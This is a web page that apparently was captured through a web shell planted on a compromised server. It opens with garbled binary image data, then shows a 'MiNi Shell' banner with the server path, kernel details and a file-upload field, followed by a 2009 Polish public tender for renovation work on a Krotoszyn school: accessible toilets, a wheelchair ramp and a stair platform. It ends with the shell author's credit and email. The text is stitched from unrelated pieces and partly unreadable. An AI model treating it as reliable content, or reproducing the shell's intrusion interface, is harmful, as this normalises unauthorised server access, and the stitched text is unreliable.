JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090923/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090923/162219-N-2009.html

<p class="kh_header"><b>Krotoszyn: Prace remontowo-budowlane w Zespole Szkół Ponadgimnazjalnych Nr 2 im. F. Libelta w Krotoszynie polegające na:
Zmianie sposobu  użytkowania części kotłowni z przeznaczeniem na sanitariaty dla osób niepełnosprawnych
 Dobudowie do istniejącego budynku dydaktycznego podjazdu dla osób niepełnosprawnych oraz montaż wewnętrznej platformy schodowej  dla osób niepełnosprawnych   na wózkach inwalidzkich</b><br>
<b>Numer ogłoszenia: 162219 - 2009; data zamieszczenia: 23.09.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zespół Szkół Ponadgimnazjalnych Nr 2 im. Karola F. Libelta w Krotoszynie , pl. Jana Pawła II 5, 63-700 Krotoszyn, woj. wielkopolskie, tel. 062 7252228, faks 062 7252028.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Prace remontowo-budowlane w Zespole Szkół Ponadgimnazjalnych Nr 2 im. F. Libelta w Krotoszynie polegające na:
Zmianie sposobu  użytkowania części kotłowni z przeznaczeniem na sanitariaty dla osób niepełnosprawnych
 Dobudowie do istniejącego budynku dydaktycznego podjazdu dla osób niepełnosprawnych oraz montaż wewnętrznej platformy schodowej  dla osób niepełnosprawnych   na wózkach inwalidzkich.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Prace remontowo-budowlane   w Zespole Szkół Ponadgimnazjalnych Nr 2 im. F. Libelta w         Krotoszynie polegające na:
1.	Zmianie sposobu użytkowania części kotłowni z przeznaczeniem na sanitariaty dla osób niepełnosprawnych
2.	 Dobudowie do istniejącego budynku dydaktycznego podjazdu dla osób niepełnosprawnych oraz montaż wewnętrznej platformy schodowej  dla osób niepełnosprawnych   na wózkach inwalidzkich w tym :
dostawę fabrycznie nowej platformy wraz z oprzyrządowaniem na miejsce montażu, Dostarczony dźwig musi posiadać wymagane aktualnymi przepisami prawa zezwolenie dopuszczające do obrotu i stosowania na terenie Polski, zgodnie z przeznaczeniem i celem, któremu ma służyć.
montaż platformy
sporządzenie dokumentacji do rejestracji w Urzędzie Dozoru Technicznego 
dopuszczenie do eksploatacji,
 wykonanie prób, odbioru i rozruchu urządzenia dźwigowego z udziałem wymaganych   instytucji, w tym Urzędu Dozoru Technicznego i Zamawiającego,
 rejestrację platformy w Urzędzie Dozoru Technicznego (w tym opłacenie kosztów odbioru i rejestracji urządzenia)
dostarczenie dokumentacji technicznej dźwigu z instrukcją obsługi, konserwacji eksploatacji w języku polskim,
przeszkolenie pracowników Zamawiającego w zakresie obsługi i eksploatacji dźwigu.
do wykonania zamówienia Wykonawca zobowiązany jest użyć materiałów gwarantujących najwyższą jakość.
wykonawca ma obowiązek posiadać w stosunku do użytych materiałów i urządzeń dokumenty potwierdzające pozwolenie na zastosowanie/wbudowanie (atesty, certyfikaty, deklaracje zgodności, świadectwa jakości).
wykonawca zabezpieczy składowane tymczasowo materiały i urządzenia do czasu ich wbudowania przed zniszczeniem, uszkodzeniem lub utratą jakości, właściwości lub parametrów, oraz udostępni do kontroli przez ustanowionego przedstawiciela Zamawiającego.
Wykonawca jest odpowiedzialny za jakość, zgodność z warunkami technicznymi i jakościowymi jakim powinno odpowiadać urządzenie stanowiące przedmiot zamówienia.
Wymagana jest należyta staranność przy realizacji zobowiązań umowy.
Wykonawca zobowiązany jest do uwzględnienia w cenie oferty kosztów urządzenia zaplecza budowy, uzgodnień, odbiorów, wyłączeń sieci, pomiarów powykonawczych, oraz wszelkich pozostałych kosztów związanych z realizacją obowiązków Wykonawcy mających na celu wykonanie Przedmiotu Zamówienia, wynikających z przepisów prawa, Specyfikacji oraz dokumentacji projektowej i specyfikacji technicznej wykonania i odbioru robót, 

            Szczegółowy opis przedmiotu zamówienia zawierają  
projekty; 
specyfikacje techniczne  wykonania  i odbioru poszczególnych robót;  
ślepe kosztorysy; 
stanowiące załączniki do niniejszej specyfikacji.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.22.38.00-4, 45.40.00.00-1, 45.21.42.20-8, 45.41.00.00-4, 45.42.00.00-7, 45.43.00.00-0, 45.44.00.00-3, 45.33.00.00-9, 45.33.22.00-5, 45.33.23.00-6, 45.33.24.00-7, 34.95.10.00-8.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.01.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 2 000,00 (dwa tysiace zł)<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1. Do postępowania przetargowego zostaną dopuszczeni Oferenci spełniający następujące wymagania:

a)	złożą prawidłową pod względem formalnym ofertę,
b)	posiadają niezbędne uprawnienia do występowania w obrocie prawnym oraz do wykonywania prac objętych przetargiem, złożą odpis z właściwego rejestru lub zaświadczenie o wpisie do  ewidencji działalności gospodarczej potwierdzający dopuszczenie do obrotu prawnego w zakresie objętym zamówieniem 
c)	spełniają  wymagania art. 22 ust. 1 oraz nie podlegają  wykluczeniu z postępowania o udzielenie zamówienia na podstawie art. 24 ust. 1 i 2 ustawy prawo zamówień publicznych  
d)	 wykonali w okresie ostatnich 5 lat przed dniem wszczęcia postępowania o udzielenie 
                  zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie minimum                   1 robotę budowlaną, odpowiadającą swoim rodzajem robotom      budowlanym                    stanowiącym przedmiot zamówienia w tym z montażem windy lub platformy dla osób                     niepełnosprawnych wraz z referencjami potwierdzającymi, że wykonane prace                   wykonane zostały należycie.
e)	dysponują osobą  posiadającą  uprawnienia budowlane do kierowania robotami budowlanymi zgodnie z wymogiem ustawy Prawo budowlane z dnia 7 lipca 1994 r.
f)	przedłożą dokument ubezpieczeniowy potwierdzający fakt, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności 
g)	złożą oświadczenie o zakresie prac, które Wykonawca zamierza powierzyć Podwykonawcy 
h)	udokumentują wpłatę wadium.
i)	przedłożą podpisany wzór umowy 
j)	przedłożą pismo z nr konta  (dołączyć tylko w przypadku  wnoszenia wadium w pieniądzu)

	2. Ocena spełniania warunków dokonana zostanie w oparciu o informacje zawarte w dokumentach i oświadczeniach, o których mowa w niniejszej SIWZ dołączonych do oferty na zasadzie spełnia-nie spełnia.  Z treści załączonych dokumentów i oświadczeń w sposób jednoznaczny musi wynikać, iż Wykonawca   spełnia  wymienione  warunki.                                                                    Uzupełnienie wymaganych dokumentów będzie możliwe  po upływie terminu składania ofert, chyba że mimo ich uzupełnienia konieczne byłoby unieważnienie postępowania.        W przypadku wątpliwości co do treści dokumentów złożonych przez wykonawcę na potwierdzenie spełniania warunków udziału w postępowaniu, Zamawiający może wezwać wykonawców w określonym przez siebie terminie do złożenia wyjaśnień. Nie spełnienie jakiegokolwiek ww. warunku spowoduje odrzucenie oferty. Oferent o tym fakcie zostanie niezwłocznie powiadomiony przez Zamawiającego..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1. Oferta musi zawierać następujące dokumenty:

a)	Wypełniony formularz ofertowy- Załącznik nr  1 + wypełnione kosztorysy 
b)	Oświadczenie o spełnianiu warunków określonych w art. 22 ust.1 oraz nie podleganiu wykluczeniu z postępowania o udzielenie zamówienia na podstawie art. 24 ust. 1 i 2 ustawy prawo zamówień publicznych  - Załącznik Nr 2
c)	Dokumenty określone w Rozporządzeniu Prezesa Rady Ministrów z dnia 19 maja 2006  r. (Dz. U. Nr 87, poz. 605 ze zmianami),  w sprawie rodzajów  dokumentów jakich może żądać zamawiający od wykonawcy, oraz form, w jakich te dokumenty mają być składane tj:
aktualny wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu  składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, potwierdzający dopuszczenie Oferenta do obrotu prawnego w zakresie objętym tym zamówieniem  

	 d)  wykaz wykonanych robót budowlanych w okresie ostatnich 5 lat przed dniem wszczęcia        postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest        krótszy          - w        tym okresie -  minimum   1 robotę budowlaną,        odpowiadającą         swoim rodzajem robotom   budowlanym stanowiącym         przedmiot         zamówienia,  w tym z montażem windy lub platformy dla osób         niepełnosprawnych    wraz z referencjami potwierdzającymi, że         wykonane prace         wykonane          zostały         należycie - Załącznik Nr 3
e)	dokumenty stwierdzające, że osoby/osoba które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane ustawą z dnia 7 lipca Prawo budowlane uprawnienia tj.: uprawnienia budowlane do kierowania robotami budowlanymi oraz zaświadczenie wydane przez izbę samorządu zawodowego potwierdzające aktualny wpis na listę członków tej izby. 
f)	dokument ubezpieczeniowy potwierdzający fakt, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności 
g)	oświadczenie o zakresie prac, które Wykonawca zamierza powierzyć Podwykonawcy - Załącznik Nr 4
h)	udokumentują wpłatę wadium.
i)	przedłożą podpisany wzór umowy - Załącznik Nr 5
j)	przedłożą pismo z nr konta - Załącznik Nr 6 (dołączyć tylko w przypadku  wnoszenia wadium w pieniądzu)

2. W przypadku, gdy wykonawca ma siedzibę lub miejsce zamieszkania za granicą RP        zobowiązany      jest  złożyć dokumenty wyszczególnione w powyższym pkt. 1, a  w miejsce       dokumentów, o       których mowa w      pkt      1c. Wykonawca zobowiązany jest przedłożyć       dokumenty wystawione        w kraju, w którym ma      siedzibę lub miejsce zamieszkania,        potwierdzające odpowiednio, że:
a)	nie otwarto jego likwidacji ani nie ogłoszono upadłości, (wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert)

3.	Jeżeli w kraju pochodzenia osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się powyższych dokumentów, wykonawca może je zastąpić stosownym dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sadowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.zsp2.krotoszyn.net.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zespół Szkół Ponadgimnazjalnych Nr 2 im. K. Libelta w Krotoszynie
Plac Jana Pawła II 5
63-700 Krotoszyn.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.10.2009 godzina 09:00, miejsce: Zespół Szkół Ponadgimnazjalnych Nr 2 im. K. Libelta w Krotoszynie
Plac Jana Pawła II 5
63-700 Krotoszyn.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com